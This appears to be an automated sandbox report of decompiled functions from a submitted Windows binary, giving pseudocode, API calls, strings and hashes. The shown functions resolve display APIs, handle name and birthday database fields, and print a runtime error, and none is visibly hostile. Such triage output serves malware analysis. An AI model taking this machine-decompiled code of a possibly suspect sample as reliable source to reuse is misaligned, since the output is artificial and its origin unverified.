                                                                              • Instruction ID: 6d6a61d64b0a46c21682db064ec92116b6d0e966afff3592de9503a681794b40
                                                                              • Opcode Fuzzy Hash: f1106e329e0d48cfa7b4281d793f4c3b4a21ab62a295908a11e446d5d3b41d10
                                                                              • Instruction Fuzzy Hash: 96518C31604225BBCF119F64EC48B9A7BB5EF04765F548166FC18E62A1C778CE50CB9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004090D5, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004090D5() {
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;

				if( *0x459e2c == 0) {
					 *0x459e30 = E00409088();
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x459e10 = 0;
						 *0x459e14 = 0;
						 *0x459e18 = 0;
						 *0x459e1c = 0;
						 *0x459e20 = 0;
						 *0x459e24 = 0;
						 *0x459e28 = 0;
						 *0x459e2c = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x459e10 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x459e14 = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x459e18 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x459e1c = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x459e24 = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x459e20 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x459e28 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x459e2c = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					return 0 |  *0x459e20 != 0x00000000;
				}
			}












                                                                              0x004090de
                                                                              0x004090f9
                                                                              0x00409104
                                                                              0x00409108
                                                                              0x00409195
                                                                              0x00409195
                                                                              0x0040919b
                                                                              0x004091a1
                                                                              0x004091a7
                                                                              0x004091ad
                                                                              0x004091b3
                                                                              0x004091b9
                                                                              0x004091bf
                                                                              0x004091c9
                                                                              0x0040910e
                                                                              0x0040911a
                                                                              0x0040911e
                                                                              0x00409123
                                                                              0x00000000
                                                                              0x00409125
                                                                              0x0040912b
                                                                              0x0040912f
                                                                              0x00409134
                                                                              0x00000000
                                                                              0x00409136
                                                                              0x0040913c
                                                                              0x00409140
                                                                              0x00409145
                                                                              0x00000000
                                                                              0x00409147
                                                                              0x0040914d
                                                                              0x00409151
                                                                              0x00409156
                                                                              0x00000000
                                                                              0x00409158
                                                                              0x0040915e
                                                                              0x00409162
                                                                              0x00409167
                                                                              0x00000000
                                                                              0x00409169
                                                                              0x0040916f
                                                                              0x00409173
                                                                              0x00409178
                                                                              0x00000000
                                                                              0x0040917a
                                                                              0x00409180
                                                                              0x00409184
                                                                              0x00409189
                                                                              0x00000000
                                                                              0x0040918b
                                                                              0x0040918d
                                                                              0x0040918e
                                                                              0x0040918e
                                                                              0x00409189
                                                                              0x00409178
                                                                              0x00409167
                                                                              0x00409156
                                                                              0x00409145
                                                                              0x00409134
                                                                              0x00409123
                                                                              0x004091ce
                                                                              0x004090e0
                                                                              0x004090ec
                                                                              0x004090ec

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(USER32,?,?,?,00409226), ref: 004090FE
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040911A
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040912B
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040913C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040914D
                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040915E
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040916F
                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00409180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                              • API String ID: 667068680-68207542
                                                                              • Opcode ID: e4bd923a8c5b841524d939b8dde4bb30d36b876c01b00240882513378a86e5f0
                                                                              • Instruction ID: fd326d4a7ba620f1166f9423cf7bd1bb53e508db2de6eb18e1d5ac10db44dcd2
                                                                              • Opcode Fuzzy Hash: e4bd923a8c5b841524d939b8dde4bb30d36b876c01b00240882513378a86e5f0
                                                                              • Instruction Fuzzy Hash: 912110B1A40301DADB12EF25ACC652FBAE1B349742354043FE408F62D2D7B88C55EB5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407664, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E00407664(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t110;
				void* _t112;
				void* _t114;
				intOrPtr* _t118;
				intOrPtr* _t119;
				void* _t127;
				void* _t129;
				void* _t131;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t144;
				void* _t146;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr* _t153;
				void* _t161;
				void* _t163;
				void* _t165;
				intOrPtr* _t169;
				intOrPtr* _t170;
				void* _t177;
				void* _t195;
				intOrPtr* _t260;
				void* _t262;

				E004128A0(E00430BAC, _t262);
				_t195 = __ecx;
				__imp__#8(_t262 - 0x24, __edi, __esi, __ebx);
				 *(_t262 - 4) =  *(_t262 - 4) & 0x00000000;
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(__ecx, "AdressID");
				 *(_t262 - 4) = 1;
				_t110 = E00406A15(E0040669E(0x458420), _t262 - 0x14);
				 *(_t262 - 4) = 2;
				_t112 = E004069CF(E0040669E(_t110), _t262 - 0x10, _t262 - 0x34);
				 *(_t262 - 4) = 3;
				_t114 = E0040626B(E0040669E(_t112), _t262 - 0x44);
				 *(_t262 - 4) = 4;
				E0040620C(_t114, _t262 - 0x24, _t114);
				_t260 = __imp__#9;
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 3;
				if( *_t260() < 0) {
					E0041FC30(_t117);
				}
				_t118 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 2;
				if(_t118 != 0) {
					 *((intOrPtr*)( *_t118 + 8))(_t118);
				}
				_t119 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 1;
				if(_t119 != 0) {
					 *((intOrPtr*)( *_t119 + 8))(_t119);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t121);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x11c, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x11c, "FirstName");
				 *(_t262 - 4) = 5;
				_t127 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 6;
				_t129 = E004069CF(E0040669E(_t127), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 7;
				_t131 = E0040626B(E0040669E(_t129), _t262 - 0x44);
				 *(_t262 - 4) = 8;
				E0040620C(_t131, _t262 - 0x24, _t131);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 7;
				if( *_t260() < 0) {
					E0041FC30(_t134);
				}
				_t135 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 6;
				if(_t135 != 0) {
					 *((intOrPtr*)( *_t135 + 8))(_t135);
				}
				_t136 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 5;
				if(_t136 != 0) {
					 *((intOrPtr*)( *_t136 + 8))(_t136);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t138);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x114, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x114, "LastName");
				 *(_t262 - 4) = 9;
				_t144 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 0xa;
				_t146 = E004069CF(E0040669E(_t144), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 0xb;
				_t148 = E0040626B(E0040669E(_t146), _t262 - 0x44);
				 *(_t262 - 4) = 0xc;
				E0040620C(_t148, _t262 - 0x24, _t148);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 0xb;
				if( *_t260() < 0) {
					E0041FC30(_t151);
				}
				_t152 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 0xa;
				if(_t152 != 0) {
					 *((intOrPtr*)( *_t152 + 8))(_t152);
				}
				_t153 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 9;
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t155);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x118, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x118, "BirthDay");
				 *(_t262 - 4) = 0xd;
				_t161 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 0xe;
				_t163 = E004069CF(E0040669E(_t161), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 0xf;
				_t165 = E0040626B(E0040669E(_t163), _t262 - 0x44);
				 *(_t262 - 4) = 0x10;
				E0040620C(_t165, _t262 - 0x24, _t165);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 0xf;
				if( *_t260() < 0) {
					E0041FC30(_t168);
				}
				_t169 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 0xe;
				if(_t169 != 0) {
					 *((intOrPtr*)( *_t169 + 8))(_t169);
				}
				_t170 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 0xd;
				if(_t170 != 0) {
					 *((intOrPtr*)( *_t170 + 8))(_t170);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t172);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x110, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				E00425C57(_t195);
				 *(_t262 - 4) =  *(_t262 - 4) | 0xffffffff;
				_t177 =  *_t260(_t262 - 0x24, 0);
				if(_t177 < 0) {
					_t177 = E0041FC30(_t177);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t262 - 0xc));
				return _t177;
			}



























                                                                              0x00407669
                                                                              0x00407678
                                                                              0x0040767a
                                                                              0x00407680
                                                                              0x00407689
                                                                              0x00407694
                                                                              0x004076a2
                                                                              0x004076ad
                                                                              0x004076bc
                                                                              0x004076c7
                                                                              0x004076d2
                                                                              0x004076dd
                                                                              0x004076e6
                                                                              0x004076ea
                                                                              0x004076ef
                                                                              0x004076f8
                                                                              0x004076f9
                                                                              0x00407701
                                                                              0x00407704
                                                                              0x00407704
                                                                              0x00407709
                                                                              0x0040770e
                                                                              0x00407712
                                                                              0x00407717
                                                                              0x00407717
                                                                              0x0040771a
                                                                              0x0040771f
                                                                              0x00407723
                                                                              0x00407728
                                                                              0x00407728
                                                                              0x0040772e
                                                                              0x0040772f
                                                                              0x00407737
                                                                              0x0040773a
                                                                              0x0040773a
                                                                              0x00407746
                                                                              0x00407754
                                                                              0x0040775e
                                                                              0x00407769
                                                                              0x00407772
                                                                              0x0040777d
                                                                              0x0040778c
                                                                              0x00407797
                                                                              0x004077a2
                                                                              0x004077ad
                                                                              0x004077b6
                                                                              0x004077ba
                                                                              0x004077c2
                                                                              0x004077c3
                                                                              0x004077cb
                                                                              0x004077ce
                                                                              0x004077ce
                                                                              0x004077d3
                                                                              0x004077d8
                                                                              0x004077dc
                                                                              0x004077e1
                                                                              0x004077e1
                                                                              0x004077e4
                                                                              0x004077e9
                                                                              0x004077ed
                                                                              0x004077f2
                                                                              0x004077f2
                                                                              0x004077f8
                                                                              0x004077f9
                                                                              0x00407801
                                                                              0x00407804
                                                                              0x00407804
                                                                              0x00407810
                                                                              0x0040781e
                                                                              0x00407828
                                                                              0x00407833
                                                                              0x0040783c
                                                                              0x00407847
                                                                              0x00407856
                                                                              0x00407861
                                                                              0x0040786c
                                                                              0x00407877
                                                                              0x00407880
                                                                              0x00407884
                                                                              0x0040788c
                                                                              0x0040788d
                                                                              0x00407895
                                                                              0x00407898
                                                                              0x00407898
                                                                              0x0040789d
                                                                              0x004078a2
                                                                              0x004078a6
                                                                              0x004078ab
                                                                              0x004078ab
                                                                              0x004078ae
                                                                              0x004078b3
                                                                              0x004078b7
                                                                              0x004078bc
                                                                              0x004078bc
                                                                              0x004078c2
                                                                              0x004078c3
                                                                              0x004078cb
                                                                              0x004078ce
                                                                              0x004078ce
                                                                              0x004078da
                                                                              0x004078e8
                                                                              0x004078f2
                                                                              0x004078fd
                                                                              0x00407906
                                                                              0x00407911
                                                                              0x00407920
                                                                              0x0040792b
                                                                              0x00407936
                                                                              0x00407941
                                                                              0x0040794a
                                                                              0x0040794e
                                                                              0x00407956
                                                                              0x00407957
                                                                              0x0040795f
                                                                              0x00407962
                                                                              0x00407962
                                                                              0x00407967
                                                                              0x0040796c
                                                                              0x00407970
                                                                              0x00407975
                                                                              0x00407975
                                                                              0x00407978
                                                                              0x0040797d
                                                                              0x00407981
                                                                              0x00407986
                                                                              0x00407986
                                                                              0x0040798c
                                                                              0x0040798d
                                                                              0x00407995
                                                                              0x00407998
                                                                              0x00407998
                                                                              0x004079a4
                                                                              0x004079b2
                                                                              0x004079bb
                                                                              0x004079c0
                                                                              0x004079c8
                                                                              0x004079cf
                                                                              0x004079d2
                                                                              0x004079d2
                                                                              0x004079da
                                                                              0x004079e2

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407669
                                                                              • VariantInit.OLEAUT32(?), ref: 0040767A
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040626B: VariantInit.OLEAUT32(?), ref: 0040627C
                                                                                • Part of subcall function 0040620C: VariantCopy.OLEAUT32(?,?), ref: 00406214
                                                                              • VariantClear.OLEAUT32(?), ref: 004076FD
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407733
                                                                              • VariantClear.OLEAUT32(?), ref: 004077C7
                                                                              • VariantClear.OLEAUT32(00000008), ref: 004077FD
                                                                              • VariantClear.OLEAUT32(?), ref: 00407891
                                                                              • VariantClear.OLEAUT32(00000008), ref: 004078C7
                                                                              • VariantClear.OLEAUT32(?), ref: 0040795B
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407991
                                                                              • VariantClear.OLEAUT32(?), ref: 004079C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$Init$ByteCharCopyH_prologMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 68346186-934635829
                                                                              • Opcode ID: e2dac832ece1b170b46b9b78bcb140af996838cc1348b689110b941efa8c6c93
                                                                              • Instruction ID: 1c6b82c77e47a3c48bff7a789f4c0ac1bccabe7c15a28163262571bff6dcae12
                                                                              • Opcode Fuzzy Hash: e2dac832ece1b170b46b9b78bcb140af996838cc1348b689110b941efa8c6c93
                                                                              • Instruction Fuzzy Hash: EAB18271E05249AADF04E7F5C955BDEB7F86F14308F1044AEA406F72C2EA386E09C769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417191, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E00417191() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x457184; // 0xb7aa1229
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x457720 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x457720; // 0x60000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x45a3e8; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x457180 == 1) {
						_t17 = _t67 + 0x457724; // 0x44c360
						_t69 = _t17;
						_t24 = E00411A30( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E00419460(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E00411A30(_t70 - 0x80) + 1 > 0x3c) {
								E0041ADB0(E00411A30(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E00411A30(_t63);
							_t12 = _t67 + 0x457724; // 0x44c360
							_t14 = E00411A30( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E00412260(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E00419460(_t51, "Runtime Error!\n\nProgram: ");
							E00419470(_t51, _t63);
							E00419470(_t51, "\n\n");
							_t15 = _t67 + 0x457724; // 0x44c360
							E00419470(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E0041C6F5();
						}
					}
				}
				return E00412FBB(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                              0x00417192
                                                                              0x00417199
                                                                              0x0041719f
                                                                              0x004171a4
                                                                              0x004171ac
                                                                              0x004171b5
                                                                              0x004171b7
                                                                              0x004171c0
                                                                              0x004171c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004171c4
                                                                              0x004171c8
                                                                              0x004171cb
                                                                              0x004171d1
                                                                              0x004171d7
                                                                              0x004171df
                                                                              0x004172cc
                                                                              0x004172cc
                                                                              0x004172d4
                                                                              0x004172e6
                                                                              0x004171f6
                                                                              0x004171fc
                                                                              0x0041720c
                                                                              0x0041721a
                                                                              0x00417225
                                                                              0x0041722b
                                                                              0x0041722c
                                                                              0x0041723c
                                                                              0x00417258
                                                                              0x0041725d
                                                                              0x0041725d
                                                                              0x00417261
                                                                              0x00417266
                                                                              0x00417273
                                                                              0x0041727b
                                                                              0x0041727f
                                                                              0x00417284
                                                                              0x0041728c
                                                                              0x00417293
                                                                              0x0041729e
                                                                              0x004172a3
                                                                              0x004172aa
                                                                              0x004172af
                                                                              0x004172b4
                                                                              0x004172b9
                                                                              0x004172ba
                                                                              0x004172bf
                                                                              0x004171fc
                                                                              0x004171df
                                                                              0x00417307

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 00417212
                                                                              • _strcat.LIBCMT ref: 00417225
                                                                              • _strlen.LIBCMT ref: 00417232
                                                                              • _strlen.LIBCMT ref: 00417241
                                                                              • _strncpy.LIBCMT ref: 00417258
                                                                              • _strlen.LIBCMT ref: 00417261
                                                                              • _strlen.LIBCMT ref: 0041726E
                                                                              • _strcat.LIBCMT ref: 0041728C
                                                                              • _strlen.LIBCMT ref: 004172D4
                                                                              • GetStdHandle.KERNEL32(000000F4,0044C360,00000000,?,00000000,00000000,00000000,00000000), ref: 004172DF
                                                                              • WriteFile.KERNEL32(00000000), ref: 004172E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3601721357-4022980321
                                                                              • Opcode ID: 64fa949466da343b4dac7115b10c594ed8a6de38688c214b274feb0bc3a67c8a
                                                                              • Instruction ID: a00c1cefda7e3fb725995756c529dfe4bdf406af58d6cee0adc4c839edc60a66
                                                                              • Opcode Fuzzy Hash: 64fa949466da343b4dac7115b10c594ed8a6de38688c214b274feb0bc3a67c8a
                                                                              • Instruction Fuzzy Hash: 06314A325042046BDB24AB75ED85FEF3778EB44348F14442BF912D3292DA7CA8C5872C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406A4B, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 276COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E00406A4B(void* __ecx) {
				void* _t102;
				void* _t105;
				void* _t107;
				intOrPtr* _t110;
				intOrPtr* _t111;
				void* _t120;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t126;
				void* _t135;
				void* _t137;
				intOrPtr* _t140;
				intOrPtr* _t141;
				void* _t147;
				void* _t150;
				void* _t152;
				intOrPtr* _t155;
				intOrPtr* _t156;
				void* _t163;
				intOrPtr* _t182;
				void* _t229;
				void* _t235;

				E004128A0(E00430A8E, _t235);
				_push(1);
				_t229 = __ecx;
				E00425C57(__ecx);
				E0040630F(E0040669E(0x458420), 0x458040, 0x458040);
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t99, "AdressID");
				 *(_t235 - 4) =  *(_t235 - 4) & 0x00000000;
				_t102 = E004061D9(_t235 - 0x50,  *((intOrPtr*)(__ecx + 0x11c)));
				 *(_t235 - 4) = 1;
				_t105 = E00406A15(E0040669E(0x458420), _t235 - 0x14);
				 *(_t235 - 4) = 2;
				_t107 = E004069CF(E0040669E(_t105), _t235 - 0x10, _t235 - 0x30);
				 *(_t235 - 4) = 3;
				_t195 = E0040669E(_t107);
				E004062B5(_t108, _t102);
				_t110 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 2;
				if(_t110 != 0) {
					_t195 =  *_t110;
					 *((intOrPtr*)( *_t110 + 8))(_t110);
				}
				_t111 =  *((intOrPtr*)(_t235 - 0x14));
				 *(_t235 - 4) = 1;
				if(_t111 != 0) {
					_t195 =  *_t111;
					 *((intOrPtr*)( *_t111 + 8))(_t111);
				}
				_t182 = __imp__#9;
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 0;
				if( *_t182() < 0) {
					E0041FC30(_t113);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
				if( *_t182() < 0) {
					E0041FC30(_t115);
				}
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t195, "FirstName");
				 *(_t235 - 4) = 4;
				 *((intOrPtr*)(_t235 - 0x14)) = E004061D9(_t235 - 0x50,  *((intOrPtr*)(_t229 + 0x114)));
				 *(_t235 - 4) = 5;
				_t120 = E00406A15(E0040669E(0x458420), _t235 - 0x18);
				 *(_t235 - 4) = 6;
				_t122 = E004069CF(E0040669E(_t120), _t235 - 0x10, _t235 - 0x30);
				 *(_t235 - 4) = 7;
				_t204 = E0040669E(_t122);
				E004062B5(_t123,  *((intOrPtr*)(_t235 - 0x14)));
				_t125 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 6;
				if(_t125 != 0) {
					_t204 =  *_t125;
					 *((intOrPtr*)( *_t125 + 8))(_t125);
				}
				_t126 =  *((intOrPtr*)(_t235 - 0x18));
				 *(_t235 - 4) = 5;
				if(_t126 != 0) {
					_t204 =  *_t126;
					 *((intOrPtr*)( *_t126 + 8))(_t126);
				}
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 4;
				if( *_t182() < 0) {
					E0041FC30(_t128);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
				if( *_t182() < 0) {
					E0041FC30(_t130);
				}
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t204, "LastName");
				 *(_t235 - 4) = 8;
				 *((intOrPtr*)(_t235 - 0x18)) = E004061D9(_t235 - 0x50,  *((intOrPtr*)(_t229 + 0x118)));
				 *(_t235 - 4) = 9;
				_t135 = E00406A15(E0040669E(0x458420), _t235 - 0x10);
				 *(_t235 - 4) = 0xa;
				_t137 = E004069CF(E0040669E(_t135), _t235 - 0x14, _t235 - 0x30);
				 *(_t235 - 4) = 0xb;
				_t213 = E0040669E(_t137);
				E004062B5(_t138,  *((intOrPtr*)(_t235 - 0x18)));
				_t140 =  *((intOrPtr*)(_t235 - 0x14));
				 *(_t235 - 4) = 0xa;
				if(_t140 != 0) {
					_t213 =  *_t140;
					 *((intOrPtr*)( *_t140 + 8))(_t140);
				}
				_t141 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 9;
				if(_t141 != 0) {
					_t213 =  *_t141;
					 *((intOrPtr*)( *_t141 + 8))(_t141);
				}
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 8;
				if( *_t182() < 0) {
					E0041FC30(_t143);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
				if( *_t182() < 0) {
					E0041FC30(_t145);
				}
				 *((short*)(_t235 - 0x40)) = 8;
				 *((intOrPtr*)(_t235 - 0x38)) = E0041FCB0(_t213, "BirthDay");
				 *(_t235 - 4) = 0xc;
				_t147 = E004061D9(_t235 - 0x60,  *((intOrPtr*)(_t229 + 0x110)));
				 *(_t235 - 4) = 0xd;
				_t150 = E00406A15(E0040669E(0x458420), _t235 - 0x20);
				 *(_t235 - 4) = 0xe;
				_t152 = E004069CF(E0040669E(_t150), _t235 - 0x1c, _t235 - 0x40);
				 *(_t235 - 4) = 0xf;
				E004062B5(E0040669E(_t152), _t147);
